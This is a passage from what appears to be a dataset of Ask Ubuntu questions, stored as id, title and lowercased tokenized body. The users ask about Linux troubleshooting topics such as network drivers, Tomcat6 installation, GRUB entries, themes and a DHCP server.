: intel corporation 82801 mobile pci bridge ( rev f3 ) 00:1f.0 isa bridge : intel corporation 82801hem ( ich8m ) lpc interface controller ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) ide controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) sata ahci controller ( rev 03 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 03 ) 05:00.0 ethernet controller : broadcom corporation netlink bcm5906m fast ethernet pci express ( rev 02 ) 06:00.0 ethernet controller : atheros communications inc. ar242x 802.11abg wireless pci express adapter ( rev 01 ) lsusb : bus 007 device 003 : id 090c:1000 feiya technology corp. memory bar bus 007 device 002 : id 064e : a101 suyin corp . bus 007 device 001 : id 0000:0000 bus 006 device 001 : id 0000:0000 bus 005 device 001 : id 0000:0000 bus 004 device 001 : id 0000:0000 bus 003 device 001 : id 0000:0000 bus 002 device 001 : id 0000:0000 bus 001 device 001 : id 0000:0000 sudo lshw -class network : *-network description : ethernet interface product : netlink bcm5906m fast ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 02 serial : 00:1b:38 : df : ce : e9 capacity : 100mb/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.86 latency=0 link=no module=tg3 multicast=yes port=twisted pair *-network unclaimed description : ethernet controller product : ar242x 802.11abg wireless pci express adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:06:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix cap_list configuration : latency=0 /etc/network/interfaces : auto lo iface lo inet loopback address 127.0.0.1 netmask 255.0.0.0 and sudo rfkill list does n't work . if i had any rep i would offer a bounty .
59761	`` the location is not a folder '' error when opening files	i 'm aware of this other question and i 'm making a new one because that solutions there were not enough for my problem . i installed xfce and pcmanfm on top of my vanilla ubuntu 10.10 installation . after i got tired of them i uninstalled them . and then in some programs ( gnome-do , firefox , file-browser-applet , chrome ) i get the error could not display the file'filename.txt ' `` the location is not a folder '' when trying to open files that those programs manage . as suggested by the previously mentioned question i tried : sudo apt-get remove exo-utils not no avail , i got ubuntu tweak and went to the file associations tab , and the folder filetype is set to open-folder is that ok ? also i checked these files /usr/share/applications/nautilus-computer.desktop /usr/share/applications/nautilus-folder-handler.desktop and they are the same as a clean 10.10 installation ( i checked it with a virtual machine ) i tracked it to gnome-open 'the name of some file.pdf' and i get the same error , and i 'm guessing that the programs sending that error are using some function ( ) that calls gnome-open or something like that . i also tried using the `` exo-preferred-applications '' to switch to nautilus , but it doesnt show the file-manager option as some suggested it would . right now i do n't have the exo utils or anything exo installed , nothing xfce specific . i ran out of things to try , so any help is appreciated . update i tried installing the package xfce and then login to that desktop and gnome-open works on xfce ... strange also i got all the files on /usr/share/desktop from a clean 10.10 installation and copied over the files on my damaged installation and it did n't helped , is not an issue with them ...
59762	how do i extract a tarball , skipping some of the leading directories ?	i am archiving a folder using following command : tar jcf `` home/username/forum/forum.tar.bz2 '' /var/www/forum/ then i am extracting using : tar jxf forum.tar.bz2 ./ it extracts correctly , but creates /home/username/forum/var/www/forum folder . what do i need to do in order to extract it into /home/username/forum folder ? thank you
59767	onscreen keyboard ? ( like osx 's keyboard viewer )	on osx you can have an onscreen keyboard shown ( preferences > language & text > input sources > mark `` keyboard & character viewer '' . you 'll then have a new icon in the menu bar with the item `` show keyboard viewer '' ) from time to time i find this useful to figure out which modifier key to press to get a certain character , as the online keyboard changes when you press modifier keys ( alt , ctrl , etc. ) . the latter is critical for me . is there something similar on ubuntu ?
59772	how can i configure and print with an hp laserjet 1000 ?	could anyone help me to configure printer ? i tried googling but have n't found anything . edit : system- > administration- > printing there are no printers and cant add new one , add button is unclickable at the beginning i did n't try to add printer and was installing those drivers , maybe i ruined something ? i used this guide ubuntuforums.org/archive/index.php/t-112556.html by maulattu 3rd post..
59776	how to enable compiz effects in unity 2d ?	i run unity on ubuntu 11.04 and ive seen people with effects on the version but i cant enable it because they removed the effects settings , any help ?
59778	does the multiarch feature in 11.10 mean the death of force -- architecture installs ?	well does the multiarch feature of 11.10 mean 64bit users will be able to install 32bit '.debs ' without resorting to the 'force -- architecture ' command ?
59781	why do i get a blank screen when booting from a cd or usb stick ?	i 'm trying to boot the install from either a usb or cd with the iso file on them , as per umbutu install page . i set my bios to first boot from them ahead of hard drive . when i try the usb it just goes to a black screen with a small cursor blinking in the corner . when i try the cd i get the same thing and then it boots windows . what am i doing wrong ?
59783	how to move windows to another workspace without switching workspace ?	xfce supports a hotkey to move a window to another workspace . in fact this does two things : it moves the window to the new workspace . switches to this workspace . i 'm trying to disable this behaviour and make the hotkey only move the window without switching the workspace . is this somehow possible , perhaps using hidden options ?
59784	found an error in font in ubuntu , where and how should i report it ?	i am playing with braille unicode characters and i just realised that dejavusans mono and freemono ( and maybe other fonts too ) show character : ⡳ u+2873 braille pattern dots-12567 as ⡣ u+2863 braille pattern dots-1267 ( they both look the same in character map , or of used in text ) dot no 5 missing . should i report it somewhere ? and where ? thanks a lot for any info .
59790	removing old linux versions on grub 2 via synaptic package manager	i have read in other sites and this question about removing old entries using synaptic package manager but when i open it i ca n't find anything when i type linux-image or numbers . edit : yes ubuntu tweak worked , but anyone knows why i ca n't find those in synaptic package manager ? if it matters i use ubuntu 10.04
59791	how do i fix my theme ?	after installing and using ubuntu 11.10 for while i decided to install gnome shell . after installing and rebooting my system i saw that ubuntu light theme ( ambiance/radiance ) is gone . i check /usr/shar/themes and /usr/shar/icons , it seems that the light themes and mono icons exist . i even reinstalled gtk3-engine-unico package but none of these effort fixed my problem : ( my desktop now looks like this : what should i do to get my default ubuntu theme back ?
59795	how do i get to my ubuntu partition ?	basically this tragic story has been told before around here . i installed ubuntu on a partition on my hard drive but it corrupted my windows when it resized . luckily for me there was a tiny factory image partition with all of windows on it . i used that to reinstall windows back on the partition . so on my computer i have three partitions on my harddrive : windows recovery windows ubuntu heres the problem : when i used the recovery to re-install windows i am now unable to get to my ubuntu partition . i have tried all the options on the boot menu and none of them lead to ubuntu . how do i get to ubuntu again ? i have a disk with ubuntu installed on it .
59800	focus a window without bringing the window forward	is there a way to focus a certain window under gnome without bringing the window up ? background : i 'm creating a script to type an arbitrary sequence characters on a certain window/application . with the help of xdotool , it is possible . but any focus function that it provides -- or any other tools do -- brings the target window forward . that , i want to find a way around .
59802	maximal power-saving on a laptop when sleep/hibernate is not possible ?	i use a very portable laptop with ubuntu running . on that laptop , neither sleep nor hibernate works reliably ( it works sometimes and it does n't the other times ) . i 'm not asking how one can get them to work , but rather , how one can maximally power-save when he/she can not sleep or hibernate the laptop but wo n't do anything with the machine during that time . please advice .
59803	disabling udp packets	i would like to completely disable udp packets from exiting or entering my computer ( ubuntu 11.04 ) , how would i go about doing this ? what are the downsides to disabling udp packets ? the reason for doing this is to prevent my real ip from being broadcasted .
59804	while setting upstart in application giving error	wht i have done is sudo emacs /etc/init/app.conf and then i write the code for my upstart # application server description `` applicationserver '' author `` rahul mehta < rahul23134654 @ gmail.com '' start on ( net-device-up and local-filesystems and runlevel [ 2345 ] ) stop on runlevel [ 016 ] exec /lily/bin/launch-hadoop when i try to save this file it says : /etc/init/ : no such directory what should i need to do to solve this problem . using ubuntu 8.04 . on ubuntu 11.04 it is giving me this error start : job failed to start
59805	sort the results from `apt-cache search < keywords > `	is there a way to sort the results from apt-cache search < keywords > ?
59809	quicklist ignores $ home in .desktop configuration	i have created quicklists very successfully but one thing is a problem , i have tried to use $ home in the exec= line but it is not accepted , i have to enter the full /home/user path . this seems at odds with most other scripts .
59811	`` kill < pid > '' not really killing the process , why ?	i am trying to improve my command line skills and i have encountered a problem where i can not kill a process . i type kill 2200 where 2200 is my pid and the process is not killed . after few minutes wait is still in the top and ps aux . i have even tried typing it with sudo - no results . any ideas why it would be like that ? edit i have found a weird dependency , where fg updates the processes list : x @ xxx : /etc/grub.d $ ps pid tty time cmd 1723 pts/0 00:00:00 bash 2200 pts/0 00:00:00 top 2202 pts/0 00:00:00 top 2258 pts/0 00:00:00 ps x @ xxx : /etc/grub.d $ fg top x @ xxx : /etc/grub.d $ ps pid tty time cmd 1723 pts/0 00:00:00 bash 2200 pts/0 00:00:00 top 2620 pts/0 00:00:00 ps x @ xxx : /etc/grub.d $ fg top x @ xxx : /etc/grub.d $ ps pid tty time cmd 1723 pts/0 00:00:00 bash 2621 pts/0 00:00:00 ps
59815	starting tomcat6 shows missing conf directory .	i 've just installed tomcat6 via apt-get on lucid . looking at the directory created here : /usr/share/tomcat6 i was expecting a conf directory to be created under this ( based on experiences elsewhere ) . instead there was a skel directory created . under this there was the directories bin and conf . do i need to patch up the installation by creating a hard link of a conf directory inside tomcat6 that points to ... /tomcat6/skel/conf - or is there something better ? ps - why do i need to to this ? why does n't it work out the box ?
59820	clementine keyboard shortcuts not working	does anyone else encounter problem with clementine 's keyboard shortcuts not working ? i have them assigned to but they do not work . although for instance the shortcut to open preferences in clementine ctrl+p works . any ideas/solutions ?
59821	hard link to directory not permitted when root	i 'm trying to create a hard link to a directory as follows root @ ... : /usr/share/tomcat6/logs # ln -- directory /usr/share/tomcat6/skel/conf conf it fails with the following error ln : creating hard link `conf ' = > `/usr/share/tomcat6/skel/conf ' : operation not permitted what am i missing ? how can i create the equivalent of this directory link ?
59822	where to store user settings for an app ?	if i want my application to store a few settings , that persist when an application closes , then where should i store them ? i 'm not talking anything complicated : two booleans and a string ( although in the future i might want to store more complex settings ) i 've heard gconf , dconf , gsettings , etc all mentioned . what is the `` preferred '' method ? preferably one that 's nice and easy in python .
59823	can not install ubuntu with unetbootin	i have tried several times to install natty on its own partition on my laptop ( winxp , intel x86 ) using unetbootin , but it always fail . there is a dialog box : failed to unmount partitions the installer needs to commit changes to partition tables , but can not do so because partitions on the following could not be unmounted . /cdrom please close any applications using these mount points . would you like the installer to try to unmount these partitions again ? if i click on `` continue '' ubiquity will hang up , that is , the slideshow will play forever . i do not have a built-in optical drive and i 'm not currently using any peripheral . i have tried sudo umount /cdrom it says that cdrom is busy . then the command fuser /cdrom returns `` stale nfs file handle '' . how can i work around this to install ubuntu ?
59824	is there something similar to spotlight ( mac ) for ubuntu	so it 's quite clear , if you do n't know what spotlight is , well , it puts an icon on your taskbar , and then you can search ( please ignore everything else but the icon , all i want is the icon and ability to search )
59826	microtek scanmaker 3880 drivers for 10.04 ?	is there available microtek scanmaker 3880 drivers for ubuntu 10.04 ? i could n't found
59832	how can i make a virtual router on ubuntu ?	i have a 3g stick that i 'm connected with to the network . i would like to share this connection with my playstation 3 . how can i create a virtual router ?
59834	what package do i install for gnome classic on a minimal install ?	unity is not supported on my hardware , and as such i want to use gnome classic . what package do i install ?
59835	why does installing tomcat6 require creating a soft link to /usr/share/java ?	i installed tomcat6 on lucid using the instructions here : https : //help.ubuntu.com/10.04/serverguide/c/tomcat.html ( i did n't create an instance level version - the system level version was fine ) when i tried to start it up i got the following error in the log : java.lang.classnotfoundexception : org.apache.catalina.startup.catalina at java.net.urlclassloader $ 1.run ( urlclassloader.java:202 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:190 ) at java.lang.classloader.loadclass ( classloader.java:306 ) at java.lang.classloader.loadclass ( classloader.java:247 ) at org.apache.catalina.startup.bootstrap.init ( bootstrap.java:216 ) at org.apache.catalina.startup.bootstrap.main ( bootstrap.java:391 ) this was resolved by doing the following : root @ ... : /var/lib/tomcat6 # ln -s /usr/share/java lib why did i need to do this ? why does n't it work out the box ? ( why is n't this in the ubuntu manual on tomcat ? )
59836	do i need to act on `` tomcat6 apr based apache tomcat native library not found '' ?	i 've installed tomcat6 via apt-get on lucid and i 'm getting the following in my tomcat catalina.out on startup : info : the apr based apache tomcat native library which allows optimal performance in production environments was not found on the java.library.path : /usr/lib/jvm/java-6- sun-1.6.0.26/jre/lib/i386/client : /usr/lib/jvm/java-6-sun- 1.6.0.26/jre/lib/i386 : /usr/lib/jvm/java-6-sun- 1.6.0.26/jre/../lib/i386 : /usr/java/packages/lib/i386 : /lib : /usr/lib any suggestions on how to fix it ? ps - why am i getting this on a vanilla tomcat6 install ? ( from apt-get ? )
59837	how to get the unity dash overlayed not maximized by default ?	i have a problem , i always have the dash maximazed in full view , and well not like is there a way to get the original one ? ?
59838	how can i change the shutdown launcher to suspend instead ?	the shutdown option from the gnome-menu or a starter in the panel , that shows the active shutdown-options like shutdown , restart , suspend , ... , has a default timer to shutdown after 60 seconds if no other option was selected . is there a way to go automatically to suspend instead of shutdown after countdown ?
59839	system battery failed -- restarted -- all evolution mails are missing	few minutes back while working on my ubuntu box i did n't realized that battery is about to finish . as soon as the battery drowned system was off and i was working in the evolution . as soon as i restarted my system and evolution to my surprise all the mails are missing . only search folders and imap directories are visible . search folders also does n't show anything . i quickly went into ~/.evolution/mail/ but there is no 'local ' folder which is supposed to store the pop mails i guess . there is only single folder named 'vfolder ' . any way to retrieve those emails . ubuntu - 11.04 evolution - 2.32.2 any clue how to get the mails back ? ?
59840	why is configuring synaptics udev rules so hard ?	i am trying to configure my synaptics driver with a few udev rules regarding the behavior of the tapbutton options , and has so far been unsuccessful in doing so . no matter what i type in my .rules file , the driver configuration stays the same , when i do a synclient -l | grep tapbutton . what exactly am i doing wrong ? why is udev so hard to configure ? and maybe most importantly , why do i have to do all this , to change the behavior of touchpad tapping ? /etc/udev/rules.d/66-xorg-synaptics.rules : action ! = '' add|change '' , goto= '' xorg_synaptics_end '' kernel ! = '' event* '' , goto= '' xorg_synaptics_end '' env { id_input_touchpad } ! = '' 1 '' , goto= '' xorg_synaptics_end '' # synclient for settings env { x11_options.tapbutton1 } = '' 1 '' env { x11_options.tapbutton2 } = '' 2 '' env { x11_options.tapbutton3 } = '' 3 '' label= '' xorg_synaptics_end ''
59844	how can i make libjpeg available to python2.5 ?	i am running ubuntu 11.04 . along with python 2.7 i have also 2.6 and 2.5 . i am using 2.5 version to work and deploy my applications on app engine . i have installed pil ( python image library ) but despite i have all the dependencies covered it informs me that it can not support jpeg and the rest of formats . how can i make the libjpeg-dev available to my custom python installation ?
59845	why does tomcat-admin install require adding admin and manager to tomcat-users.xml manually ?	i installed tomcat6 on lucid using apt-get . all working . i installed tomcat-admin . not working . i amended the /etc/tomcat6/tomcat-users.xml file to uncomment the users and roles ( from the default ) to be like the following : < role rolename= '' tomcat '' / > < role rolename= '' role1 '' / > < user username= '' tomcat '' password= '' password '' roles= '' tomcat '' / > < user username= '' both '' password= '' password '' roles= '' tomcat , role1 '' / > < user username= '' role1 '' password= '' password '' roles= '' role1 '' / > this still did n't work . then from the following page i added . < role rolename= '' manager '' / > < user username= '' admin '' password= '' secret '' roles= '' manager '' / > then it worked . why does n't this occur as part of the install ? ( why is n't this in the ubuntu manual on tomcat ? )
59846	bash history search , partial + up-arrow	i have searched , but not found anything on this . i am looking for a functionality in bash , using a terminal . way back when , i had a user on a debian system , and a friend set me up with a convenient history search feature ( i believe i used tcsh then ) , where i would type the beginning of a previous command , hit up-arrow , and it would do a search , based on the partial string . e.g . if my history is : ./script.pl ./script.pl arg1 cat output cat output | grep yada and i type . , and press up-arrow , it would show me : ./script.pl arg1 . press it again and it would show ./script.pl , etc . very much like it would perform a grep on .bash_history . is there a way to get this functionality ?
59850	is it possible to change font dpi in 11.04 ?	with the introduction of the new global system settings application , it seems like they forgot about this ( along with many other important ) features . is there still a way to do this in 11.04 ?
59852	tinted green picture when connecting dell inspiron 1525 to a tv via hdmi	i have a dell inspiron 1525 intel gma x3100 graphics intel 965 chipset the built-in monitor works fine , but when i try to connect it to my toshiba 32wl48e lcd tv via the hdmi port , i get a green tinted picture . the same laptop worked fine with the same tv with windows ( i reformatted and installed ubuntu 11.04 now , so no windows left ) . i checked the tv and the settings are fine , as is the hdmi cable , so the problem must exist in the software settings . anyone know how to resolve this issue so the picture on the hdmi tv looks normal ?
59857	where do the files that i download go ?	i use the ubuntu one files app for android on my htc desire and downloaded one of my files . my questions is this though , where exactly do the files you download go ? i ca n't find the file anywhere on my phone : / any help would be greatly appreciated .
59858	how do i get tor to use a global proxy ?	i 'm trying to set up my ubuntu system to use tor globally , in all applications , but i ca n't seem to find any instructions for the newer releases , so everything i find it years out of date . right now , i have tor installed from the tor repositories , as well as privoxy . i followed this set of commands , which do n't seem to make much sense anyway . sudo aptitude install tor sudo vim /etc/tor/torrc sudo vim /etc/privoxy/config comment out : “logfile logfile” and “jarfile jarfile” find : listen-address 127.0.0.1:8118 add ( on next line ) : forward-socks4a / localhost:9050 . ( including the period ) sudo /etc/init.d/tor restart & & sudo /etc/init.d/privoxy restart from this link : https : //vocf.wordpress.com/2008/02/18/using-tor-in-ubuntu-torify-our-life/ basically , i added these two lines to my /etc/privoxy/config : listen-address 127.0.0.1:8118 forward-socks4a / localhost:9050 . but i keep getting this error message when i restart the tor/privoxy server : sep 02 19:29:42.471 b780c8d0 error : ignoring unrecognized directive 'forward-socks:4a / localhost:9050 . ' ( 314890724ul ) in line 729 in configuration file ( /etc/privoxy/config ) i assume the error is because the instructions are for *buntu 6.06 , but i ca n't find any more recent instructions . any help here ? there must be some way of doing this in more recent versions of ubuntu , right ? thank you !
59861	how to hide the launcher when fullscreen apps like freecol are running ?	every time i run freecol the unity launcher appears and stays there on top of all apps and does n't hide like it usually does . how to fix that ?
59864	dockbarx : adding more buttons eg main menu or shutdown	how might i add a shutdown button in dockbarx ? i see from the below image ( from http : //www.omgubuntu.co.uk/2011/02/window-switcher-dockbarx-adds-media-player-buttons-dock-helpers/ ) that i seem to be able to have a `` start menu '' in dockbarx ? how can i do that ? i think it will have a shutdown button in there already
59867	how well does the dell inspiron duo work ?	i am thinking seriously to buy a dell inspiron duo tablet/pc , but as a ubuntu lover i do n't know if it works well or which features will be lost . has anyone worked with this tablet ? ? any suggestions ? ? thanks : )
59868	heat issues on 11.10 beta ?	i am running an old gateway laptop ( 7330gz ) with 1 gig of ram and 80 gig hdd , when i went to try 11.04 i found myself overheating frequently and ended up returning to 10.10 . has anyone noticed any problems with overheating in the 11.10 beta 1 ?
59870	recommendations for a webdav client	i am trying to get additional functionality from a school website that can allow multiple file uploads/downloads via drag and drop between the site 's resources folders and my personal computer via a webdav client , versus downloading each individual file manually . however , this feature is only officially supported for windows and mac , or for 3rd-party clients for those operating systems . i would like to be able to use this feature with ubuntu 11.04 . i have already taken a look at this question , but had no luck with its answer ... probably because it never asks me for my school password , and i ca n't find a way to input one . if there 's a way to do this using what 's already installed by default , or from some other application , please let me know . update : when i try connecting through nautilus , i get the following error message , regardless of whether i picked webdav ( http ) or secure webdav ( https ) : and just to reiterate , at no point does it ever ask for my password .
59879	how to remove the old gdm	i have installed ubuntu 11.10 beta and all of its changes are now working and let me testing them , but the only missing thing is the lightdm 's new theme which does n't work and insted i have the old gdm login screen . my question is how to replace it with the newest lightdm . edit : i figured out what is the problem which is really different from the possible duplicate inserted here ! ! ! . the problem is that i need to install a package called unity-greeter to make the new ubuntu lightdm theme work . so please guys reopen the question as i want to answer it with what i found .
59886	how to compelety remove php ?	i need to clean up my server from php 5.3 packages ( there are plenty of them ) in order to be able to compile php 5.2 . i am wondering what is the easiest/safest method to get rid of them all ? thanks
59887	making the `` switch '' windows to ubuntu	i am a information systems student in college and i 'm just getting tired with the bs that goes along with windows and i 'm planning to switch to ubuntu . is there anything new users need to know right from the start ? also i 've tried googling for resources for new users but have came up with mostly ubuntu vs other distro links , so if anyone could provide links to some linux/ubuntu beginner tips it would be great . thanks in advance !
59890	ttf-mscorefonts-installer is not available	i 'm trying to apt-get install ttf-mscorefonts-installer in ubuntu 10.04 lts server , but i get package ttf-mscorefonts-installer is not available , but is referred to by another package . do i need to enable a non-standard repository for this to work ?
59897	how can i create my own ubuntu theme ?	i 'm currently running ubuntu 11.10 . my question is how can i create my own ubuntu theme . i 'm a coder ( html/css/php/sql ) , so i think i 'm capable of creating my own theme , i just need to know where/how to start . i was hoping someone could point me to the right direction . the basic settings in themes/customize are n't enough for what i need to do . i 'm not even sure whether unity and gnome shell share the same themes , but if not , i 'd probably go for theme-ing the unity .
59898	3d support from nouveau drivers	my gpu is an old one ( fx 5500 ) , but it supports 3d acceleration with the nvidia driver . there is experimental acceleration support in the open source drivers as far as i know , and i would like to try it out on natty . what are my options ? i know about x updates ppa by the ubuntu-x team , and it worked with the binary blob for me . can it provide open-source 3d acceleration ?
59901	realtek rtl8111/8168b wired network does n't work anymore	this sounds like it 's a common problem upgrading 11.04 , but i am having trouble finding a common solution , and one that will work for me . i just applied updates via the update manager and now my wired network connection is down . i know ubuntu network settings is the issue , because i have a dual-boot with win 7 and my network/internet is fine on win 7 . i do n't know too much about networking , so what can i do to trouble shoot this issue ? i can choose an older grub version , 2.6.38-8 instead of 2.6.38-11 and this does not resolve the issue . here is my lspci result : 00:00.0 host bridge : ati technologies inc rd890 northbridge only single slot pci-e gfx hydra part ( rev 02 ) 00:02.0 pci bridge : ati technologies inc rd890 pci to pci bridge ( pci express gpp port b ) 00:04.0 pci bridge : ati technologies inc rd890 pci to pci bridge ( pci express gpp port d ) 00:05.0 pci bridge : ati technologies inc rd890 pci to pci bridge ( pci express gpp port e ) 00:06.0 pci bridge : ati technologies inc rd890 pci to pci bridge ( pci express gpp port f ) 00:07.0 pci bridge : ati technologies inc rd890 pci to pci bridge ( pci express gpp port g ) 00:09.0 pci bridge : ati technologies inc rd890 pci to pci bridge ( pci express gpp port h ) 00:0a.0 pci bridge : ati technologies inc rd890 pci to pci bridge ( external gfx1 port a ) 00:11.0 sata controller : ati technologies inc sb7x0/sb8x0/sb9x0 sata controller [ ide mode ] ( rev 40 ) 00:12.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : ati technologies inc sbx00 smbus controller ( rev 41 ) 00:14.1 ide interface : ati technologies inc sb7x0/sb8x0/sb9x0 ide controller ( rev 40 ) 00:14.2 audio device : ati technologies inc sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : ati technologies inc sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : ati technologies inc sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:15.0 pci bridge : ati technologies inc device 43a0 00:16.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:00.0 vga compatible controller : ati technologies inc juniper [ radeon hd 5700 series ] 01:00.1 audio device : ati technologies inc juniper hdmi audio [ radeon hd 5700 series ] 02:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 06:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 07:00.0 sata controller : jmicron technology corp. jmb362/jmb363 serial ata controller ( rev 03 ) 07:00.1 ide interface : jmicron technology corp. jmb362/jmb363 serial ata controller ( rev 03 ) 08:0e.0 firewire ( ieee 1394 ) : texas instruments tsb43ab23 ieee-1394a-2000 controller ( phy/link ) 09:00.0 sata controller : jmicron technology corp. jmb362/jmb363 serial ata controller ( rev 02 ) 09:00.1 ide interface : jmicron technology corp. jmb362/jmb363 serial ata controller ( rev 02 ) here is my sudo lshw -class network : *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 03 serial : 6c : f0:49 : e7:72 : e8 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:40 ioport:9e00 ( size=256 ) memory : fceff000-fcefffff memory : fcef8000-fcefbfff memory : fce00000-fce1ffff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth1 version : 03 serial : 6c : f0:49 : e7:72 : ea size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:47 ioport:8e00 ( size=256 ) memory : fddff000-fddfffff memory : fddf8000-fddfbfff memory : fdd00000-fdd1ffff
59903	voip software for lucid	i am on 10.04 . i 've got a voip account in smartvoip.com . i tried to set up different clients like empathy , linphone , qutecome , twinkle , etc . but could n't get any of them working . all the time i get registration failed message . is this a firewall issue ? any help will be highly appreciated . thanks in advance .
59906	how do i connect my desktop and my laptop using an ethernet cable to transfer files ?	i have an ethernet cable ( not a crossover cable ) to connect my laptop and my desktop ubuntu machines . i want to transfer large amounts of data . is it possible with such a cable ? i believe that between two windows machines such a connection is possible ( though i 'm not totally sure ) .
59907	how do i change the transparency level of gnome-terminal ?	i want to increase or decrease the transparency of gnome-terminal in unity .
59918	dhcp server does n't start	i installed dhcp3-server in ubuntu server 11.04 apt-get install dhcp3-server however , an error message during installation : traitement des actions différées ( « triggers » ) pour « man-db » ... traitement des actions différées ( « triggers » ) pour « ureadahead » ... paramétrage de isc-dhcp-server ( 4.1.1-p1-15ubuntu9.1 ) ... generating /etc/default/isc-dhcp-server ... * starting isc dhcp server dhcpd * check syslog for diagnostics [ fail ] invoke-rc.d : initscript isc-dhcp-server , action `` start '' failed . paramétrage de dhcp3-server ( 4.1.1-p1-15ubuntu9.1 ) ... tail -f /var/log/syslog says : sep 2 03:29:20 srv dhcpd : internet systems consortium dhcp server 4.1.1-p1 sep 2 03:29:20 srv dhcpd : copyright 2004-2010 internet systems consortium . sep 2 03:29:20 srv dhcpd : all rights reserved . sep 2 03:29:20 srv dhcpd : for info , please visit https : //www.isc.org/software/dhcp/ sep 2 03:29:20 srv dhcpd : internet systems consortium dhcp server 4.1.1-p1 sep 2 03:29:20 srv dhcpd : copyright 2004-2010 internet systems consortium . sep 2 03:29:20 srv dhcpd : all rights reserved . sep 2 03:29:20 srv dhcpd : for info , please visit https : //www.isc.org/software/dhcp/ sep 2 03:29:20 srv dhcpd : wrote 0 leases to leases file . sep 2 03:29:20 srv dhcpd : sep 2 03:29:20 srv dhcpd : no subnet declaration for eth0 ( 192.168.1.1 ) . sep 2 03:29:20 srv dhcpd : ** ignoring requests on eth0 . if this is not what sep 2 03:29:20 srv dhcpd : you want , please write a subnet declaration sep 2 03:29:20 srv dhcpd : in your dhcpd.conf file for the network segment sep 2 03:29:20 srv dhcpd : to which interface eth0 is attached . ** sep 2 03:29:20 srv dhcpd : sep 2 03:29:20 srv dhcpd : sep 2 03:29:20 srv dhcpd : not configured to listen on any interfaces ! sep 2 03:29:23 srv kernel : [ 1625.286737 ] type=1400 audit ( 1314930563.298:18 ) apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/dhcpd '' pid=2045 comm= '' apparmor_parser '' when i want access to the file /etc/dhcp3/dhcpd.conf i can not find it but the package dhcp-server is installed . root @ srv : /etc/dhcp3 # ls -l total 4 drwxr-xr-x 2 root root 4096 2011-09-01 06:42 dhclient-enter-hooks.d
59919	how do i change fonts & icons in a theme ?	i 'm using ubuntu 11.10 . i was slightly annoyed to find no easy way to change the icons and fonts on the appearances window . apparently , you have to choose a theme and live with it 's default settings . i 'm used to using varieties of window borders and icons on a theme . does anyone know how to make it easier to change the fonts and icons on my default ubuntu theme ?
59922	how can i manually edit the unity top panel ?	after the recent update of 11.10 , i am left with two battery indicators , for some reason -- the new one , with the options to show the remaining time and bring up the power settings , and the old one , which does n't do anything when clicked . how can i manually edit the top panel listings to remove this artifact ?
59927	faint clicking sound as console text is scrolled	this is a strange thing i 've noticed across several different computers . when i have a console session open , every time i scroll ( say in a pager ) there 's a faint click for every line that goes by . it becomes more noticeable if i continuously scroll . muting my laptop 's speakers has no effect . is this by design , or some strange quirk ?
